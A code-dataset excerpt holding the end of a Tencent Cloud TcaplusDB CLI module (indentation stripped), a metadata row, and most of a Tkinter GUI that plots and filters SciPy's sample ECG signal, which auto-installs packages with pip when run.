def doModifyTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"IdlFiles": Utils.try_to_json(argv, "--IdlFiles"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClusterTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeClusterTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterIds": Utils.try_to_json(argv, "--ClusterIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClusterTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeClusterTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20190823": tcaplusdb_client_v20190823,
}
MODELS_MAP = {
"v20190823": models_v20190823,
}
ACTION_MAP = {
"DescribeTableTags": doDescribeTableTags,
"ModifyTableTags": doModifyTableTags,
"CreateCluster": doCreateCluster,
"DescribeUinInWhitelist": doDescribeUinInWhitelist,
"DescribeTablesInRecycle": doDescribeTablesInRecycle,
"RollbackTables": doRollbackTables,
"ModifyClusterName": doModifyClusterName,
"DeleteCluster": doDeleteCluster,
"ModifyClusterPassword": doModifyClusterPassword,
"DeleteIdlFiles": doDeleteIdlFiles,
"RecoverRecycleTables": doRecoverRecycleTables,
"CreateBackup": doCreateBackup,
"CreateTables": doCreateTables,
"ModifyTableQuotas": doModifyTableQuotas,
"DescribeClusters": doDescribeClusters,
"DeleteTableGroup": doDeleteTableGroup,
"ModifyTableGroupName": doModifyTableGroupName,
"CreateTableGroup": doCreateTableGroup,
"DescribeRegions": doDescribeRegions,
"DescribeTasks": doDescribeTasks,
"ModifyClusterTags": doModifyClusterTags,
"ModifyTableGroupTags": doModifyTableGroupTags,
"DescribeTableGroupTags": doDescribeTableGroupTags,
"DescribeTableGroups": doDescribeTableGroups,
"CompareIdlFiles": doCompareIdlFiles,
"DescribeIdlFileInfos": doDescribeIdlFileInfos,
"DeleteTables": doDeleteTables,
"ModifyTableMemos": doModifyTableMemos,
"VerifyIdlFiles": doVerifyIdlFiles,
"ClearTables": doClearTables,
"ModifyTables": doModifyTables,
"DescribeTables": doDescribeTables,
"DescribeClusterTags": doDescribeClusterTags,
}
AVAILABLE_VERSION_LIST = [
v20190823.version,
]
AVAILABLE_VERSIONS = {
'v' + v20190823.version.replace('-', ''): {"help": v20190823_help.INFO,"desc": v20190823_help.DESC},
}
def tcaplusdb_action(argv, arglist):
if "help" in argv:
versions = sorted(AVAILABLE_VERSIONS.keys())
opt_v = "--" + OptionsDefine.Version
version = versions[-1]
if opt_v in argv:
version = 'v' + argv[opt_v].replace('-', '')
if version not in versions:
print("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return
action_str = ""
docs = AVAILABLE_VERSIONS[version]["help"]
desc = AVAILABLE_VERSIONS[version]["desc"]
for action, info in docs.items():
action_str += " %s\n" % action
action_str += Utils.split_str(" ", info["desc"], 120)
helpstr = HelpTemplate.SERVICE % {"name": "tcaplusdb", "desc": desc, "actions": action_str}
print(helpstr)
else:
print(ErrorMsg.FEW_ARG)
def version_merge():
help_merge = {}
for v in AVAILABLE_VERSIONS:
for action in AVAILABLE_VERSIONS[v]["help"]:
if action not in help_merge:
help_merge[action] = {}
help_merge[action]["cb"] = ACTION_MAP[action]
help_merge[action]["params"] = []
for param in AVAILABLE_VERSIONS[v]["help"][action]["params"]:
if param["name"] not in help_merge[action]["params"]:
help_merge[action]["params"].append(param["name"])
return help_merge
def register_arg(command):
cmd = NiceCommand("tcaplusdb", tcaplusdb_action)
command.reg_cmd(cmd)
cmd.reg_opt("help", "bool")
cmd.reg_opt(OptionsDefine.Version, "string")
help_merge = version_merge()
for actionName, action in help_merge.items():
c = NiceCommand(actionName, action["cb"])
cmd.reg_cmd(c)
c.reg_opt("help", "bool")
for param in action["params"]:
c.reg_opt("--" + param, "string")
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
c.reg_opt(stropt, "string")
def parse_global_arg(argv):
params = {}
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
if stropt in argv:
params[opt] = argv[stropt]
else:
params[opt] = None
if params[OptionsDefine.Version]:
params[OptionsDefine.Version] = "v" + params[OptionsDefine.Version].replace('-', '')
config_handle = Configure()
profile = config_handle.profile
if ("--" + OptionsDefine.Profile) in argv:
profile = argv[("--" + OptionsDefine.Profile)]
is_conexist, conf_path = config_handle._profile_existed(profile + "." + config_handle.configure)
is_creexist, cred_path = config_handle._profile_existed(profile + "." + config_handle.credential)
config = {}
cred = {}
if is_conexist:
config = config_handle._load_json_msg(conf_path)
if is_creexist:
cred = config_handle._load_json_msg(cred_path)
if os.environ.get(OptionsDefine.ENV_SECRET_ID):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
if os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
if os.environ.get(OptionsDefine.ENV_REGION):
config[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in params.keys():
if param == OptionsDefine.Version:
continue
if params[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId]:
if param in cred:
params[param] = cred[param]
else:
raise Exception("%s is invalid" % param)
else:
if param in config:
params[param] = config[param]
elif param == OptionsDefine.Region:
raise Exception("%s is invalid" % OptionsDefine.Region)
try:
if params[OptionsDefine.Version] is None:
version = config["tcaplusdb"][OptionsDefine.Version]
params[OptionsDefine.Version] = "v" + version.replace('-', '')
if params[OptionsDefine.Endpoint] is None:
params[OptionsDefine.Endpoint] = config["tcaplusdb"][OptionsDefine.Endpoint]
except Exception as err:
raise Exception("config file:%s error, %s" % (conf_path, str(err)))
versions = sorted(AVAILABLE_VERSIONS.keys())
if params[OptionsDefine.Version] not in versions:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return params
def show_help(action, version):
docs = AVAILABLE_VERSIONS[version]["help"][action]
desc = AVAILABLE_VERSIONS[version]["desc"]
docstr = ""
for param in docs["params"]:
docstr += " %s\n" % ("--" + param["name"])
docstr += Utils.split_str(" ", param["desc"], 120)
helpmsg = HelpTemplate.ACTION % {"name": action, "service": "tcaplusdb", "desc": desc, "params": docstr}
print(helpmsg)
def get_actions_info():
config = Configure()
new_version = max(AVAILABLE_VERSIONS.keys())
version = new_version
try:
profile = config._load_json_msg(os.path.join(config.cli_path, "default.configure"))
version = profile["tcaplusdb"]["version"]
version = "v" + version.replace('-', '')
except Exception:
pass
if version not in AVAILABLE_VERSIONS.keys():
version = new_version
return AVAILABLE_VERSIONS[version]["help"]
| 40.013053 | 108 | 0.693972 | 6,101 | 55,178 | 6.073922 | 0.046222 | 0.064117 | 0.186119 | 0.069461 | 0.809564 | 0.794398 | 0.786923 | 0.7805 | 0.775265 | 0.735435 | 0 | 0.006608 | 0.185418 | 55,178 | 1,378 | 109 | 40.04209 | 0.817852 | 0.006361 | 0 | 0.6875 | 0 | 0 | 0.083479 | 0.004015 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032072 | false | 0.008224 | 0.01398 | 0 | 0.07648 | 0.003289 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
38778d25186c97ff8f334fade1084e51e23c1a0e | 23,984 | py | Python | GUI-ECG-Advanced-Filtering-and-Spectral-Analysis.py | Philip-M-Schmidt/GUI-ECG-Advanced-Filtering | 78f0b36f671e0c08643d868889479dd07f96729e | [
"Apache-2.0"
] | null | null | null | GUI-ECG-Advanced-Filtering-and-Spectral-Analysis.py | Philip-M-Schmidt/GUI-ECG-Advanced-Filtering | 78f0b36f671e0c08643d868889479dd07f96729e | [
"Apache-2.0"
] | null | null | null | GUI-ECG-Advanced-Filtering-and-Spectral-Analysis.py | Philip-M-Schmidt/GUI-ECG-Advanced-Filtering | 78f0b36f671e0c08643d868889479dd07f96729e | [
"Apache-2.0"
] | null | null | null | # GUI of ECG Signal Generator with Spectral Analysis and Filtering
# Editor: Philip Schmidt
# Date: 24.01.2020
# Detailed script documentation in form of comments right next to the code
# Enjoy using the program!
# Installing and upgrading all necessary packages
from subprocess import call
my_packages = ['matplotlib', 'scipy', 'numpy==1.17.4']
def upgrade(package_list):
call(['pip', 'install', '--upgrade', '--user'] + package_list)
upgrade(my_packages)
# import of libraries
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
from scipy.misc import electrocardiogram
import numpy as np
import tkinter as tk
from tkinter import *
from tkinter import ttk
from math import pi
import scipy.fftpack as sf
import scipy.signal as sig
LARGE_FONT= ("Verdana", 12)
class window(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
tk.Tk.wm_title(self, "GUI ECG Signal with Advanced Filtering and Spectral_Analysis")
self._frame = None
self.switch_frame(StartPage)
def switch_frame(self, frame_class):
"""Destroys current frame and replaces it with a new one."""
new_frame = frame_class(self)
if self._frame is not None:
self._frame.destroy()
self._frame = new_frame
self._frame.pack()
class StartPage(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Welcome", font=("Verdana", 16))
label.pack(pady=10,padx=10)
self.pack(expand=True, fill='both')
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
label_1 = tk.Label(self, text="Sampling Rate / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack()
label_1_1 = tk.Label(self, text="360") # nice way of sorting widgets and grid to type in text :)
label_1_1.pack()
label_2 = tk.Label(self, text="Beats per Minutes / bpm")
label_2.pack()
label_2 = tk.Label(self, text="60")
label_2.pack()
label = tk.Label(self, text="This is the generated ECG! Analyze and filter your new ECG signal by clicking the buttons above!", font=LARGE_FONT)
label.pack(pady=10,padx=10)
self.ecg()
def ecg(self):
ecg = electrocardiogram()
fs = 360
time = np.arange(ecg.size) / fs
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(111)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(time, ecg)
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
class Analyzer(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Analyzer", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Back to Home", command=lambda: master.switch_frame(StartPage)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
label = tk.Label(self, text="The powerspectrum of the generated ECG signal is analyzed here!", font=LARGE_FONT)
label.pack(pady=10,padx=10)
self.spectral_analysis()
def spectral_analysis(self):
# Plotting ECG
Fs = 360
t = 4
f = 10
x = electrocardiogram()
n = np.arange(x.size) / Fs
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(211)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
#Spectral Analysis
x_fft = abs(sf.fft(x))
l = np.size(x)
fr = (Fs/2)*np.linspace(0, 1, l/2)
x_magnitude = (2 / l)* abs(x_fft[0:np.size(fr)])
f2 = Figure(figsize=(10,6), dpi=100)
b = f.add_subplot(212)
b.set_xlabel('Frequency / Hz')
b.set_ylabel('Magnitude / dB')
b.set_title("Spectral analysis of the ECG")
b.plot(fr, 20*x_magnitude)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar2 = NavigationToolbar2Tk(canvas2, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f.tight_layout()
f2.tight_layout()
class Filters(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Filters", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Back to Home", command=lambda: master.switch_frame(StartPage)).pack()
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="High Pass Filtering",
command=lambda: master.switch_frame(Highpass_Filter)).pack()
ttk.Button(self, text="Low Pass Filtering",
command=lambda: master.switch_frame(Lowpass_Filter)).pack()
ttk.Button(self, text="Band Pass Filtering",
command=lambda: master.switch_frame(Bandpass_Filter)).pack()
ttk.Button(self, text="Band Stop Filtering",
command=lambda: master.switch_frame(Bandstop_Filter)).pack()
label = tk.Label(self, text="This is the ECG we are going to filter! Please select your filter :)", font=LARGE_FONT)
label.pack(pady=10,padx=10)
self.ecg()
def ecg(self):
ecg = electrocardiogram()
fs = 360
time = np.arange(ecg.size) / fs
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(111)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(time, ecg)
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
class Bandpass_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Band Pass Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
Lower_CutoffFrequency = tk.simpledialog.askfloat("Lower CutoffFrequency", "Which lower Cut off Frequency do you want?")
Upper_CutoffFrequency = tk.simpledialog.askfloat("Upper CutoffFrequency", "Which upper Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Lower Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Lower_CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_1 = tk.Label(self, text="Upper Cut off Frequency / Hz")
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Upper_CutoffFrequency)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Bandpass_Filter(Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber)
def Bandpass_Filter(self, Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber):
matplotlib.pyplot.close('all')
# Design Band Pass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([Lower_CutoffFrequency , Upper_CutoffFrequency]) # Cut off Frequency!!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'bandpass')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('Band Pass Filter Frequency Response')
a.plot(W, 20 * np.log10(h))
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Bandpass filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(312)
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('Band Pass Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar2 = NavigationToolbar2Tk(canvas, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
f3 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(313)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
class Highpass_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="High Pass Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
CutoffFrequency = tk.simpledialog.askfloat("CutoffFrequency", "Which Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Highpass_Filter(CutoffFrequency, Ordernumber)
def Highpass_Filter(self, CutoffFrequency, Ordernumber):
# Design Highpass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([ CutoffFrequency ]) # Cut off Frequency!!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'highpass')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('High Pass Filter Frequency Response')
a.plot(W, 20 * np.log10(h))
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Highpass filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(312)
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('High Pass Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar2 = NavigationToolbar2Tk(canvas, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f3 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(313)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
class Lowpass_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Low Pass Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
CutoffFrequency = tk.simpledialog.askfloat("CutoffFrequency", "Which Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Lowpass_Filter(CutoffFrequency, Ordernumber)
def Lowpass_Filter(self, CutoffFrequency, Ordernumber):
# Design Lowpass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([ CutoffFrequency ]) # Cut off Frequency!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'lowpass')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('Low Pass Filter Frequency Response')
a.plot(W, 20 * np.log10(h))
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Highpass filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(312)
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('Low Pass Filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar2 = NavigationToolbar2Tk(canvas, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f3 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(313)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
class Bandstop_Filter(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self, master)
label = tk.Label(self, text="Band Stop Filtering", font=("Verdana", 16))
label.pack(pady=10,padx=10)
ttk.Button(self, text="Analyzer", command=lambda: master.switch_frame(Analyzer)).pack()
ttk.Button(self, text="Filters", command=lambda: master.switch_frame(Filters)).pack()
Lower_CutoffFrequency = tk.simpledialog.askfloat("Lower CutoffFrequency", "Which lower Cut off Frequency do you want?")
Upper_CutoffFrequency = tk.simpledialog.askfloat("Upper CutoffFrequency", "Which upper Cut off Frequency do you want?")
Ordernumber = tk.simpledialog.askinteger("Ordernumber", "Which Ordernumber do you want?")
label_1 = tk.Label(self, text="Lower Cut off Frequency / Hz") # nice way of sorting widgets and grid to type in text :)
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Lower_CutoffFrequency) # nice way of sorting widgets and grid to type in text :)
label_1_1.pack(padx=2, pady=2)
label_1 = tk.Label(self, text="Upper Cut off Frequency / Hz")
label_1.pack(padx=2, pady=2)
label_1_1 = tk.Label(self, text=Upper_CutoffFrequency)
label_1_1.pack(padx=2, pady=2)
label_2 = tk.Label(self, text="Ordernumber")
label_2.pack(padx=2, pady=2)
label_2_1 = tk.Label(self, text=Ordernumber)
label_2_1.pack(padx=2, pady=2)
self.Bandstop_Filter(Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber)
def Bandstop_Filter(self, Lower_CutoffFrequency, Upper_CutoffFrequency, Ordernumber):
# Design Highpass Filter
Fs = 360
x = electrocardiogram()
n = np.arange(x.size) / Fs
filter_order = Ordernumber # Changeable FilterOrder
cut_off_f = np.array([Lower_CutoffFrequency, Upper_CutoffFrequency]) # Cut off Frequency!!!!
normalized= 2*cut_off_f / Fs
[b,c] = sig.butter(filter_order, normalized, btype = 'bandstop')
# filterresponse
[W,h] = sig.freqz(b,c, worN = 1024)
W = Fs * W / (2 * pi)
f = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(311)
